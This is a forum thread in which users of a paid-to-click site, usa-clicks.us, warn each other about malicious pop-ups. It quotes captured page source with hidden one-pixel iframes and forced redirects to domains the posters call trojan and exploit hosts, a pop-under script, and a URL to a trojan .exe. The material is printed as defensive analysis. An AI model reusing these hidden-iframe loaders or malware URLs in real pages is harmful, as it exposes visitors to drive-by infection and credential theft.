I can't even log into this program with a window popping up saying my computer is infected with spyware and if i try to close it it trys to force a download and sometimes succeeds without my permission to download, I literally have to shut firefox down and restart a new window
I can't complain to them as they have no contact sight from the home signup page...
Maybe they'll figure it out. when I don't click any more emails....
Full Version: USA-Clicks
No zeroiframes detected!
Check took 3.11 seconds
(Level: 0) Url checked:
http:// usa-clicks.us
This one loads luxemil - ptpads.us
Check took 3.11 seconds
(Level: 0) Url checked:
http:// usa-clicks.us
CODE
Source code of submitted URL:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Usa-clicks.us</title>
<link href="style.css" rel="stylesheet" type="text/css" />
<script>
//Pop-under window- By JavaScript Kit
//Credit notice must stay intact for use
//Visit http:// javascriptkit.com for this script
//specify page to pop-under
var popunder="http:// www.ptpads.us/ptp.php?usr=wojtek0s0"
//specify popunder window features
//set 1 to enable a particular feature, 0 to disable
var winfeatures="width=800,height=510,scrollbars=0,resizable=0,toolbar=0,location=0,menubar=0,status=0,directories=0"
//Pop-under only once per browser session? (0=no, 1=yes)
//Specifying 0 will cause popunder to load every time page is loaded
var once_per_session=1
///No editing beyond here required/////
function get_cookie(Name) {
var search = Name + "="
var returnvalue = "";
if (document.cookie.length > 0) {
offset = document.cookie.indexOf(search)
if (offset != -1) { // if cookie exists
offset += search.length
// set index of beginning of value
end = document.cookie.indexOf(";", offset);
// set index of end of cookie value
if (end == -1)
end = document.cookie.length;
returnvalue=unescape(document.cookie.substring(offset, end))
}
}
return returnvalue;
}
function loadornot(){
if (get_cookie('popunder')==''){
loadpopunder()
document.cookie="popunder=yes"
}
}
function loadpopunder(){
win2=window.open(popunder,"",winfeatures)
win2.blur()
window.focus()
}
if (once_per_session==0)
loadpopunder()
else
loadornot()
</script>
</head>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Usa-clicks.us</title>
<link href="style.css" rel="stylesheet" type="text/css" />
<script>
//Pop-under window- By JavaScript Kit
//Credit notice must stay intact for use
//Visit http:// javascriptkit.com for this script
//specify page to pop-under
var popunder="http:// www.ptpads.us/ptp.php?usr=wojtek0s0"
//specify popunder window features
//set 1 to enable a particular feature, 0 to disable
var winfeatures="width=800,height=510,scrollbars=0,resizable=0,toolbar=0,location=0,menubar=0,status=0,directories=0"
//Pop-under only once per browser session? (0=no, 1=yes)
//Specifying 0 will cause popunder to load every time page is loaded
var once_per_session=1
///No editing beyond here required/////
function get_cookie(Name) {
var search = Name + "="
var returnvalue = "";
if (document.cookie.length > 0) {
offset = document.cookie.indexOf(search)
if (offset != -1) { // if cookie exists
offset += search.length
// set index of beginning of value
end = document.cookie.indexOf(";", offset);
// set index of end of cookie value
if (end == -1)
end = document.cookie.length;
returnvalue=unescape(document.cookie.substring(offset, end))
}
}
return returnvalue;
}
function loadornot(){
if (get_cookie('popunder')==''){
loadpopunder()
document.cookie="popunder=yes"
}
}
function loadpopunder(){
win2=window.open(popunder,"",winfeatures)
win2.blur()
window.focus()
}
if (once_per_session==0)
loadpopunder()
else
loadornot()
</script>
</head>
This one loads luxemil - ptpads.us
CODE
Total zeroiframes found: 1
(Level: 0) Url checked:
http:// www.ptpads.us/ptp.php?usr=wojtek0s0
Zeroiframes detected on this site: 0
No ad codes identified
(Level: 1) Url checked: (frame source)
scripts/include/ptp_top.php?usr=wojtek0s0&credit=0&url=http:// tds.revsp.com/in.cgi?default&cmp=799
Blank page / could not connect
(Level: 1) Url checked: (frame source)
http:// www.ptpads.us/scripts/include/ptp_left.php
Zeroiframes detected on this site: 0
Google code detected (Ads, not a cheater)
(Level: 2) Url checked: (script source)
http:// pagead2.googlesyndication.com/pagead/show_ads.js
Zeroiframes detected on this site: 0
No ad codes identified
(Level: 3) Url checked: (iframe source)
http:// pagead2.googlesyndication.com/pagead/+m(d)+
Blank page / could not connect
(Level: 3) Url checked: (script source)
http:// pagead2.googlesyndication.com/pagead/+m(d)+
Blank page / could not connect
(Level: 3) Url checked: (script source)
http:// pagead2.googlesyndication.com/pagead/+m(d)+
Blank page / could not connect
(Level: 1) Url checked: (frame source)
http:// tds.revsp.com/in.cgi?default&cmp=799
Zeroiframes detected on this site: 0
No ad codes identified
(Level: 1) Url checked: (frame source)
http:// www.ptpads.us/scripts/include/ptp_right.php
Zeroiframes detected on this site: 0
No ad codes identified
(Level: 2) Url checked: (iframe source)
http:// www.luxemil.com/search/portal.php?username=mew
Zeroiframes detected on this site: 1
No ad codes identified
(Level: 3) Url checked: (iframe source)
http:// www.luxemil.com/search/anticheat.php?username=mew
Zeroiframes detected on this site: 0
No ad codes identified
(Level: 0) Url checked:
http:// www.ptpads.us/ptp.php?usr=wojtek0s0
Zeroiframes detected on this site: 0
No ad codes identified
(Level: 1) Url checked: (frame source)
scripts/include/ptp_top.php?usr=wojtek0s0&credit=0&url=http:// tds.revsp.com/in.cgi?default&cmp=799
Blank page / could not connect
(Level: 1) Url checked: (frame source)
http:// www.ptpads.us/scripts/include/ptp_left.php
Zeroiframes detected on this site: 0
Google code detected (Ads, not a cheater)
(Level: 2) Url checked: (script source)
http:// pagead2.googlesyndication.com/pagead/show_ads.js
Zeroiframes detected on this site: 0
No ad codes identified
(Level: 3) Url checked: (iframe source)
http:// pagead2.googlesyndication.com/pagead/+m(d)+
Blank page / could not connect
(Level: 3) Url checked: (script source)
http:// pagead2.googlesyndication.com/pagead/+m(d)+
Blank page / could not connect
(Level: 3) Url checked: (script source)
http:// pagead2.googlesyndication.com/pagead/+m(d)+
Blank page / could not connect
(Level: 1) Url checked: (frame source)
http:// tds.revsp.com/in.cgi?default&cmp=799
Zeroiframes detected on this site: 0
No ad codes identified
(Level: 1) Url checked: (frame source)
http:// www.ptpads.us/scripts/include/ptp_right.php
Zeroiframes detected on this site: 0
No ad codes identified
(Level: 2) Url checked: (iframe source)
http:// www.luxemil.com/search/portal.php?username=mew
Zeroiframes detected on this site: 1
No ad codes identified
(Level: 3) Url checked: (iframe source)
http:// www.luxemil.com/search/anticheat.php?username=mew
Zeroiframes detected on this site: 0
No ad codes identified
From the ptpads URL I got free20, drivecleaner, some porn URL going through the status bar as well as luxemil, before I hit stop. They actually have winantiviruspro in the PTP frame!! And that has four zero iframe visible on that page.
There are some trojans on there too, presumably got keyloggers in them. This is a very nasty site!
This is stuff from adblock before I hit stop:
http://www. luxemil.com/search/portal.php?username=mew (Autosearches)
http://www. free20.com/portal/index.php?aff=mew (Autosearches)
http:// zero.allgreathost.com/framecj.htm?aff_id=1006
http:// codecsoft.net/strong/066/ (Trojan/exploit)
http:// nnew-adult.info/traffic/snt01/ (Trojan/exploit)
http:// tinyurl.com/2ns6q3
http:// pornoinfosn.com/images/logo.gif
http:// codecsoft.net/strong/066/exp1.htm (Trojan/exploit)
http:// codecsoft.net/strong/066/exp2.htm (Trojan/exploit)
http:// codecsoft.net/strong/066/exp3.htm (Trojan/exploit)
http:// codecsoft.net/strong/066/exp4.htm (Trojan/exploit)
This is the code from the winantiviruspro site that's in the PTP frame (the url on open in new window is: http:// tds.revsp.com/in.cgi?default
Free20 is in the credit frame
http:// ptpads.us/scripts/include/ptp_top.php?usr=wojtek0s0&credit=8&url=http://tds.revsp.com/in.cgi?default&cmp=799
http:// codecsoft.net/strong/066/ (Trojan Do not click!)
I don't believe these people. I could understand them sending autosearches, but now they are pusposely sending trojans to people and paying members to promote the links to spread them
There are some trojans on there too, presumably got keyloggers in them. This is a very nasty site!
This is stuff from adblock before I hit stop:
http://www. luxemil.com/search/portal.php?username=mew (Autosearches)
http://www. free20.com/portal/index.php?aff=mew (Autosearches)
http:// zero.allgreathost.com/framecj.htm?aff_id=1006
http:// codecsoft.net/strong/066/ (Trojan/exploit)
http:// nnew-adult.info/traffic/snt01/ (Trojan/exploit)
http:// tinyurl.com/2ns6q3
http:// pornoinfosn.com/images/logo.gif
http:// codecsoft.net/strong/066/exp1.htm (Trojan/exploit)
http:// codecsoft.net/strong/066/exp2.htm (Trojan/exploit)
http:// codecsoft.net/strong/066/exp3.htm (Trojan/exploit)
http:// codecsoft.net/strong/066/exp4.htm (Trojan/exploit)
This is the code from the winantiviruspro site that's in the PTP frame (the url on open in new window is: http:// tds.revsp.com/in.cgi?default
CODE
<script language="javascript" type="text/javascript"><!--
window.open("http://go.drivecleaner.com/MTA1OTM=/2/4506/ax=1/ed=2/ex=1//","dfdr","x=5000,top=5000,y=5000, left=5000,height=10,width=10,directories=no,toolbar=no,addressbar=no, resizable=yes,menubar=no,scrollbars=yes");
// -->
</SCRIPT>
</head>
<iframe src="http://zero.allgreathost.com/framecj.htm?aff_id=1006" width=1 height=1></iframe>
<iframe src='http://codecsoft.net/strong/066/' width=1 height=1></iframe>
<iframe src="http://nnew-adult.info/traffic/snt01/" width=1 height=1></iframe>
<iframe src="http://tinyurl.com/2ns6q3" width=1 height=1></iframe>
<body>
<DIV align=center>
<CENTER><META HTTP-EQUIV="Refresh" CONTENT="2; URL=http://go.drivecleaner.com/MTA1OTM=/2/4506/ax=1/ed=2/ex=1//">
window.open("http://go.drivecleaner.com/MTA1OTM=/2/4506/ax=1/ed=2/ex=1//","dfdr","x=5000,top=5000,y=5000, left=5000,height=10,width=10,directories=no,toolbar=no,addressbar=no, resizable=yes,menubar=no,scrollbars=yes");
// -->
</SCRIPT>
</head>
<iframe src="http://zero.allgreathost.com/framecj.htm?aff_id=1006" width=1 height=1></iframe>
<iframe src='http://codecsoft.net/strong/066/' width=1 height=1></iframe>
<iframe src="http://nnew-adult.info/traffic/snt01/" width=1 height=1></iframe>
<iframe src="http://tinyurl.com/2ns6q3" width=1 height=1></iframe>
<body>
<DIV align=center>
<CENTER><META HTTP-EQUIV="Refresh" CONTENT="2; URL=http://go.drivecleaner.com/MTA1OTM=/2/4506/ax=1/ed=2/ex=1//">
Free20 is in the credit frame
http:// ptpads.us/scripts/include/ptp_top.php?usr=wojtek0s0&credit=8&url=http://tds.revsp.com/in.cgi?default&cmp=799
CODE
<iframe width=1 height=1 frameborder=0 src='http://www.free20.com/portal/index.php?aff=mew' marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe>
http:// codecsoft.net/strong/066/ (Trojan Do not click!)
CODE
No zeroiframes detected!
Check took 1.54 seconds
(Level: 0) Url checked:
http://codecsoft.net/strong/066/
Zeroiframes detected on this site: 0
No ad codes identified
(Level: 1) Url checked: (iframe source)
http://codecsoft.net/strong/066/exp1.htm
Zeroiframes detected on this site: 0
No ad codes identified
(Level: 1) Url checked: (iframe source)
http://codecsoft.net/strong/066/exp2.htm
Zeroiframes detected on this site: 0
No ad codes identified
(Level: 1) Url checked: (iframe source)
http://codecsoft.net/strong/066/exp3.htm
Zeroiframes detected on this site: 0
No ad codes identified
(Level: 1) Url checked: (iframe source)
http://codecsoft.net/strong/066/exp4.htm
Zeroiframes detected on this site: 0
No ad codes identified
Check took 1.54 seconds
(Level: 0) Url checked:
http://codecsoft.net/strong/066/
Zeroiframes detected on this site: 0
No ad codes identified
(Level: 1) Url checked: (iframe source)
http://codecsoft.net/strong/066/exp1.htm
Zeroiframes detected on this site: 0
No ad codes identified
(Level: 1) Url checked: (iframe source)
http://codecsoft.net/strong/066/exp2.htm
Zeroiframes detected on this site: 0
No ad codes identified
(Level: 1) Url checked: (iframe source)
http://codecsoft.net/strong/066/exp3.htm
Zeroiframes detected on this site: 0
No ad codes identified
(Level: 1) Url checked: (iframe source)
http://codecsoft.net/strong/066/exp4.htm
Zeroiframes detected on this site: 0
No ad codes identified
I don't believe these people. I could understand them sending autosearches, but now they are pusposely sending trojans to people and paying members to promote the links to spread them
Wow, no wonder moochette has problems. Thanks wagdoll, glad I didn't actually go there. I just used the Jutakys-Detektor. Hope you everything sorted out moochette.
Yeah, there's more in there too. Jutaky's detektor didn't show it up in your scan, and it gave an error message for me which is why I went to the page directly.
http:// zero.allgreathost.com/framecj.htm?aff_id=1006 (Do not click, active malware!)
This has an adodb stream exploit on there and this .exe file
As you can see from the end "troj url" that is another trojan downloading
This is up there with iframemoney/xbanners/kamilet for maliciousness.
http:// zero.allgreathost.com/framecj.htm?aff_id=1006 (Do not click, active malware!)
This has an adodb stream exploit on there and this .exe file
CODE
http://zero.allgreathost.com/abc1006def.exe'; // troj url
As you can see from the end "troj url" that is another trojan downloading
This is up there with iframemoney/xbanners/kamilet for maliciousness.
I have checked my computer, I have run 2 different virus scans, a anti-Spyware program, AND spybot.....
My computer comes up clean (except for tracking cookies)....
I once again tried to log into the sight, and I got an ad come up saying that some member was credited 0 credits for logging into the sight (I did it directly from FireFOX) followed NO LINK......and walla in the middle of the page comes up a box saying that my computer has logs of all porn sights I've visited etc etc etc....the only way to get out of it without FORCING a download was to go into Windows Task Menu and manually shut down firefox.....
Somehow I don't think its me....
I run each and every program at least every other day......I stopped using IE to do PTR emails.....and I FINALLY picked up the last TH on my computer the other week that kept trying to install every time I ran IE......
once again as soon as I tried to enter the sight...... only this time I got an ad.....and yeap, I've been that rout of the 'free virus scan software etc...its nothing but a TH, and malware, and Spyware'.....
moochette
My computer comes up clean (except for tracking cookies)....
I once again tried to log into the sight, and I got an ad come up saying that some member was credited 0 credits for logging into the sight (I did it directly from FireFOX) followed NO LINK......and walla in the middle of the page comes up a box saying that my computer has logs of all porn sights I've visited etc etc etc....the only way to get out of it without FORCING a download was to go into Windows Task Menu and manually shut down firefox.....
Somehow I don't think its me....
I run each and every program at least every other day......I stopped using IE to do PTR emails.....and I FINALLY picked up the last TH on my computer the other week that kept trying to install every time I ran IE......
once again as soon as I tried to enter the sight...... only this time I got an ad.....and yeap, I've been that rout of the 'free virus scan software etc...its nothing but a TH, and malware, and Spyware'.....
moochette
Same thing from a different computer........
I tried to acces usa-clicks.us from a totally different computer, if its not the sight, its whoever has the first advertisement.
I couldn't get to the sight without a popup window advertising to come up, that I did from the main page--not a link, so I shouldn't be seeing any advertisement at all or promotions.....a persons promotion came up and then the spyware/adult tracks window forcing me to shut firefox down to avoid clicking on OK, or even the x bar or cancel......
For once I can say its NOT my computer......because I went to a computer that I know is free of spyware and malware......
I tried to acces usa-clicks.us from a totally different computer, if its not the sight, its whoever has the first advertisement.
I couldn't get to the sight without a popup window advertising to come up, that I did from the main page--not a link, so I shouldn't be seeing any advertisement at all or promotions.....a persons promotion came up and then the spyware/adult tracks window forcing me to shut firefox down to avoid clicking on OK, or even the x bar or cancel......
For once I can say its NOT my computer......because I went to a computer that I know is free of spyware and malware......
It's not your computer moochette, the site is sending you these trojans on purpose inside that popup. They are trying to damage your PC and probably put on keyloggers to access your e-currency accounts (like e-gold).
about a month ago, I purchased advertising and never received it. 
Emailed them a few times and never received a response.
Emailed them a few times and never received a response.
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.